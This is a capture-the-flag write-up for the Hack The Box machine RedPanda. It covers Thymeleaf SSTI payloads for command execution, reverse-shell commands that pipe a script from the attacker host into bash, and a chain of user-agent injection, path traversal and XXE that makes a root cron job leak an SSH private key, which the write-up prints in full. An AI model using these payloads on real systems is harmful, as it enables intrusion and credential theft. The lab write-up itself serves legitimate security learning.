# RedPanda - HTB

[[_TOC_]]

## Summary

<div align="center"><img width="560" height="424" src="images/0.png"></div>

RedPanda is a nice easy-rated HTB machine created by [Woodenk](https://app.hackthebox.com/users/25507)

For foothold, we exploit an SSTI in Thymeleaf templating engine to execute OS commands.  
To get a shell, we need to get around some nuances of `Runtime.getRuntime().exec()`  
The root is a little involved, where we exploit a couple of path traversals, a special element injection, and some more to get arbitrary file read with XXE.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.11.170
Nmap scan report for 10.10.11.170
Host is up (0.23s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy
```

```console
opcode@parrot$ nmap -sC -sV -p 22,8080 -oN redpanda.nmap 10.10.11.170
Nmap scan report for 10.10.11.170
Host is up (0.24s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open  http-proxy
|_http-open-proxy: Proxy might be redirecting requests
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 
|     Content-Type: text/html;charset=UTF-8
|     Content-Language: en-US
|     Date: Sun, 10 Jul 2022 07:51:48 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en" dir="ltr">
|     <head>
|     <meta charset="utf-8">
|     <meta author="wooden_k">
|     <!--Codepen by khr2003: https://codepen.io/khr2003/pen/BGZdXw -->
|     <link rel="stylesheet" href="css/panda.css" type="text/css">
|     <link rel="stylesheet" href="css/main.css" type="text/css">
|     <title>Red Panda Search | Made with Spring Boot</title>
|     </head>
|     <body>
|     <div class='pande'>
|     <div class='ear left'></div>
|     <div class='ear right'></div>
|     <div class='whiskers left'>
|     <span></span>
|     <span></span>
|     <span></span>
|     </div>
|     <div class='whiskers right'>
|     <span></span>
|     <span></span>
|     <span></span>
|     </div>
|     <div class='face'>
|     <div class='eye
|   HTTPOptions: 
|     HTTP/1.1 200 
|     Allow: GET,HEAD,OPTIONS
|     Content-Length: 0
|     Date: Sun, 10 Jul 2022 07:51:48 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Sun, 10 Jul 2022 07:51:48 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|_    Request</h1></body></html>
|_http-title: Red Panda Search | Made with Spring Boot
```

We have `ssh` on port 22 and `http-proxy` on port 8080.  

Visiting the website on port 8080:

![1](images/1.png)

Searching in there brings some hilarious results:

![2](images/2.png)

Clicking on the "Author" takes us to another page:

![3](images/3.png)

For some reason, I tried XPath injection with the "Export table" option:
```
http://10.10.11.170:8080/export.xml?author=woodenk+or+1%3d1+or+'a'%3d'a
```
I tried a bunch of other payloads, but nothing worked.

## SSTI in Thymeleaf templating engine

Our search term gets displayed on the screen when we use the search on home page. In such cases, it is beneficial to test for SSTI.  
Since the title bar says "Red Panda Search | Made with Spring Boot", we can use a Java payload:
```
${7*7}
```
It returns: "Error occurred: banned characters"

Googling for "spring boot ssti", we can find a neat article: https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/  
Thymeleaf is one of the templating engines used with Java.  
The article mentions that `${...}` is used for variable expressions, and Thymeleaf supports some other alternate expressions too.  
One of those is `*{...}`, used for selection expressions and is similar to variable expressions but used for specific purposes.

Using it works and `49` is returned:
```
*{7*7}
```

Next, we can try OS command execution through SSTI:
```
*{T(java.lang.Runtime).getRuntime().exec('whoami')}
```
It seems to have worked, but we do not get the command output. Instead, we get:
```
Process[pid=8776, exitValue="not exited"]
```

We can still verify the OS command execution:
```
*{T(java.lang.Runtime).getRuntime().exec('ping -c 2 10.10.14.35')}
```

We can see that ICMP packets were sent to our machine:

![4](images/4.png)

With lots of googling and trial-and-error, I worked out two functional payloads to have the command output printed:
```
*{new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).useDelimiter("\\A").next()}
```
and
```
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
```

## Getting pipes to work with `Runtime.getRuntime().exec()`

After that, we can try to get a shell:
```
*{new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("bash -c 'bash -i >& /dev/tcp/10.10.14.35/9001 0>&1'").getInputStream()).useDelimiter("\\A").next()}
```
This one did not work, and neither did the base64 encoded one.

Next, I tried to use the `curl` revshell approach as it does not have any bad characters.  
We can verify that curl is available on the box with this payload:
```
*{new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("which curl").getInputStream()).useDelimiter("\\A").next()}
```

We can make some arrangements on our machine for `curl`:
```console
opcode@parrot$ cd /var/www/html
opcode@parrot$ echo -n "bash -c 'bash -i >& /dev/tcp/10.10.14.35/9001 0>&1'" | sudo tee index.html
opcode@parrot$ sudo python3 -m http.server 80
```
With this, `curl 10.10.14.35 | bash` should be enough to get us a shell.  
We can try it:
```
*{new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("curl 10.10.14.35 | bash").getInputStream()).useDelimiter("\\A").next()}
```
It prints out the reverse shell instead of spawning it.

We can try looking at the errors:
```
*{new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("curl -s 10.10.14.35 | bash").getErrorStream()).useDelimiter("\\A").next()}
```
And the error was:
```
% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                Dload  Upload   Total   Spent    Left  Speed

0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
curl: (6) Could not resolve host: |
% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                Dload  Upload   Total   Spent    Left  Speed

0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
curl: (6) Could not resolve host: bash
```
For some reason, it is trying to resolve `|` as an URL.  

Googling the error, we'd learn that `Runtime.getRuntime().exec()` has issues with control operators (e.g. `|`) and redirection operators (e.g. `>`) because the commands are not executed inside of a terminal environment.

After some more google searches, we can find a few ways to get around this issue.

### by passing the command as an array of strings

This stackoverflow answer mentions a workaround that involves passing the command as an array of strings:  
https://stackoverflow.com/questions/5928225/how-to-make-pipes-work-with-runtime-exec

Hence, the payload becomes:
```
*{new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(new String[] { "bash", "-c", "curl 10.10.14.35 | bash" }).getInputStream()).useDelimiter("\\A").next()}
```

It would get us a shell.

### by using `bash -c` and brace expansion

Later, [ARZ#6828](https://twitter.com/arz_101) shared an alternate approach, which used brace expansion:
https://web.archive.org/web/20220126205656/http://www.jackson-t.ca/runtime-exec-payloads.html

Using the website, we can encode `curl 10.10.14.35 | bash` to get `bash -c {echo,Y3VybCAxMC4xMC4xNC4zNSB8IGJhc2g=}|{base64,-d}|{bash,-i}`

The final payload becomes:
```
*{new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("bash -c {echo,Y3VybCAxMC4xMC4xNC4zNSB8IGJhc2g=}|{base64,-d}|{bash,-i}").getInputStream()).useDelimiter("\\A").next()}
```

We can make it smaller:
```
*{new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("bash -c {curl,10.10.14.35}|{bash,-i}").getInputStream()).useDelimiter("\\A").next()}
```

### by using `bash -c` and `${IFS}`

The earlier payload is simply using brace expansion to avoid spaces. We can do the same with ${IFS} as well:
```
*{new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec('bash -c curl${IFS}10.10.14.35|bash').getInputStream()).useDelimiter("\\A").next()}
```
Sadly, this one does not work on this box as `$` is a banned character.

### by expanding positional parameters with `@`

While doing another box, I came across this article:  
https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html

It gives us another great payload:
```
*{new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("bash -c $@|bash . echo curl 10.10.14.35 | bash").getInputStream()).useDelimiter("\\A").next()}
```
(I might have to replace double quotes with single quotes)  
This one uses `$` too, which would not work on this box either.

## Arbitrary file read as root with XXE

After getting a shell, we can stabilize it:
```console
woodenk@redpanda:~$ python3 -c 'import pty;pty.spawn("/bin/bash");'
^Z
opcode@parrot$ stty raw -echo; fg
woodenk@redpanda:~$ export TERM=xterm-256color
woodenk@redpanda:~$ exec /bin/bash
```

```console
woodenk@redpanda:~$ id
uid=1000(woodenk) gid=1001(logs) groups=1001(logs),1000(woodenk)
```

Let us take a look at files owned by `logs` group:
```console
woodenk@redpanda:~$ find / -group logs 2>/dev/null | grep -v '/home\|/proc\|/tmp'
/opt/panda_search/redpanda.log
/credits
/credits/damian_creds.xml
/credits/woodenk_creds.xml
```

The `redpanda.log` file logs all requests to the website. Upon accessing from my browser, the following line gets added:
```
200||10.10.15.17||Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0||/img/crafty.jpg
```

After transferring `pspy` (https://github.com/DominicBreuker/pspy) to this box, we can find a cron job:
```
2022/07/11 07:14:01 CMD: UID=0    PID=18619  | /usr/sbin/CRON -f 
2022/07/11 07:14:01 CMD: UID=0    PID=18621  | /bin/sh /root/run_credits.sh 
2022/07/11 07:14:01 CMD: UID=0    PID=18620  | /bin/sh -c /root/run_credits.sh 
2022/07/11 07:14:01 CMD: UID=0    PID=18622  | java -jar /opt/credit-score/LogParser/final/target/final-1.0-jar-with-dependencies.jar 
```
UID=0 indicates that this CRON is running with root privileges.

The source code for `credit-score` is available at `/opt/credit-score/LogParser/final/src/main/java/com/logparser/App.java`
```java
package com.logparser;
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileWriter;
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
import java.util.Scanner;

import com.drew.imaging.jpeg.JpegMetadataReader;
import com.drew.imaging.jpeg.JpegProcessingException;
import com.drew.metadata.Directory;
import com.drew.metadata.Metadata;
import com.drew.metadata.Tag;

import org.jdom2.JDOMException;
import org.jdom2.input.SAXBuilder;
import org.jdom2.output.Format;
import org.jdom2.output.XMLOutputter;
import org.jdom2.*;

public class App {
    public static Map parseLog(String line) {
        String[] strings = line.split("\\|\\|");
        Map map = new HashMap<>();
        map.put("status_code", Integer.parseInt(strings[0]));
        map.put("ip", strings[1]);
        map.put("user_agent", strings[2]);
        map.put("uri", strings[3]);
        

        return map;
    }
    public static boolean isImage(String filename){
        if(filename.contains(".jpg"))
        {
            return true;
        }
        return false;
    }
    public static String getArtist(String uri) throws IOException, JpegProcessingException
    {
        String fullpath = "/opt/panda_search/src/main/resources/static" + uri;
        File jpgFile = new File(fullpath);
        Metadata metadata = JpegMetadataReader.readMetadata(jpgFile);
        for(Directory dir : metadata.getDirectories())
        {
            for(Tag tag : dir.getTags())
            {
                if(tag.getTagName() == "Artist")
                {
                    return tag.getDescription();
                }
            }
        }

        return "N/A";
    }
    public static void addViewTo(String path, String uri) throws JDOMException, IOException
    {
        SAXBuilder saxBuilder = new SAXBuilder();
        XMLOutputter xmlOutput = new XMLOutputter();
        xmlOutput.setFormat(Format.getPrettyFormat());

        File fd = new File(path);
        
        Document doc = saxBuilder.build(fd);
        
        Element rootElement = doc.getRootElement();
 
        for(Element el: rootElement.getChildren())
        {
    
            
            if(el.getName() == "image")
            {
                if(el.getChild("uri").getText().equals(uri))
                {
                    Integer totalviews = Integer.parseInt(rootElement.getChild("totalviews").getText()) + 1;
                    System.out.println("Total views:" + Integer.toString(totalviews));
                    rootElement.getChild("totalviews").setText(Integer.toString(totalviews));
                    Integer views = Integer.parseInt(el.getChild("views").getText());
                    el.getChild("views").setText(Integer.toString(views + 1));
                }
            }
        }
        BufferedWriter writer = new BufferedWriter(new FileWriter(fd));
        xmlOutput.output(doc, writer);
    }
    public static void main(String[] args) throws JDOMException, IOException, JpegProcessingException {
        File log_fd = new File("/opt/panda_search/redpanda.log");
        Scanner log_reader = new Scanner(log_fd);
        while(log_reader.hasNextLine())
        {
            String line = log_reader.nextLine();
            if(!isImage(line))
            {
                continue;
            }
            Map parsed_data = parseLog(line);
            System.out.println(parsed_data.get("uri"));
            String artist = getArtist(parsed_data.get("uri").toString());
            System.out.println("Artist: " + artist);
            String xmlPath = "/credits/" + artist + "_creds.xml";
            addViewTo(xmlPath, parsed_data.get("uri").toString());
        }
    }
}
```

Let us dissect this code.  
It starts with loading the `fd` for `/opt/panda_search/redpanda.log`  
Next, it loops over all lines in `redpanda.log` and only if a line ends with `.jpg` the rest of the code gets executed.  
First, `parseLog` function is used on the line. It separates the components using `||` as delimiter, mapping out four values: `status_code`, `ip`, `user-agent` and `uri`.  
This step is vulnerable to special element injection. We can coerce `uri` to any value of our choice if we modify the user agent to include `||` while making the requests.

As expected, the rest of the operations are all on the `uri`.  
The following function is `getArtist`. It visits `/opt/panda_search/src/main/resources/static + uri`, and grabs the value for the "Artist" tag from the metadata for that file.  
Since we control `uri`, we can use path traversal to point to a jpg file we control.

Next, it uses the function `addViewTo` to find a file in the root directory: `/credits/" + artist + "_creds.xml"`  
Sadly, `logs` group can only read files inside `/credits`; it cannot write new files.
And that file has to be in a format similar to the other files in `/credits`:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<credits>
  <author>damian</author>
  <image>
    <uri>/img/angy.jpg</uri>
    <views>1</views>
  </image>
  <image>
    <uri>/img/shy.jpg</uri>
    <views>0</views>
  </image>
  <image>
    <uri>/img/crafty.jpg</uri>
    <views>0</views>
  </image>
  <image>
    <uri>/img/peter.jpg</uri>
    <views>0</views>
  </image>
  <totalviews>1</totalviews>
</credits>
```
This function just increases the view counter for that image.  
Since we control the image, we can change its metadata, including the Artist tag. Once again, we can use path traversal so that it looks for `artist + "_creds.xml"` at a place of our choice.

As a result, we can make this java application parse any arbitrary XML file. There is scope for XXE; we can try it.

First, create a malicious XML and place it in `/dev/shm/opcode_cred.xml`:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///root/.ssh/id_rsa" >]>
<credits>
  <spice>&xxe;</spice>
  <author>opcode</author>
  <image>
    <uri>/../../../../../../../dev/shm/OS.jpg</uri>
    <views>0</views>
  </image>
  <totalviews>0</totalviews>
</credits>
```

Next, grab a JPG file, and change its metadata with `exiftool`:
```console
opcode@parrot$ exiftool -Artist="../dev/shm/opcode" OS.jpg
```
We can upload this file to `/dev/shm` now.

Finally, trigger the exploit using a curl request with the appropriate user-agent:
```console
opcode@parrot$ curl -A 'curl/7.74.0||/../../../../../../../dev/shm/OS.jpg' http://10.10.11.170:8080
```
(Make sure to run the `curl` command after the cleanup script has run. Having `pspy` running in another shell can be helpful for monitoring that)

The cron job runs every two minutes. After waiting for a while,
```console
woodenk@redpanda:/opt/panda_search$ cat /dev/shm/opcode_cred.xml 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo>
<credits>
  <spice>-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACDeUNPNcNZoi+AcjZMtNbccSUcDUZ0OtGk+eas+bFezfQAAAJBRbb26UW29
ugAAAAtzc2gtZWQyNTUxOQAAACDeUNPNcNZoi+AcjZMtNbccSUcDUZ0OtGk+eas+bFezfQ
AAAECj9KoL1KnAlvQDz93ztNrROky2arZpP8t8UgdfLI0HvN5Q081w1miL4ByNky01txxJ
RwNRnQ60aT55qz5sV7N9AAAADXJvb3RAcmVkcGFuZGE=
-----END OPENSSH PRIVATE KEY-----</spice>
  <author>opcode</author>
  <image>
    <uri>/../../../../../../../dev/shm/OS.jpg</uri>
    <views>2</views>
  </image>
  <totalviews>2</totalviews>
</credits>
```

We can save the private key as `id_rsa.root` and get shell as root:
```console
opcode@parrot$ chmod 600 id_rsa.root
opcode@parrot$ ssh -i id_rsa.root root@10.10.11.170
```
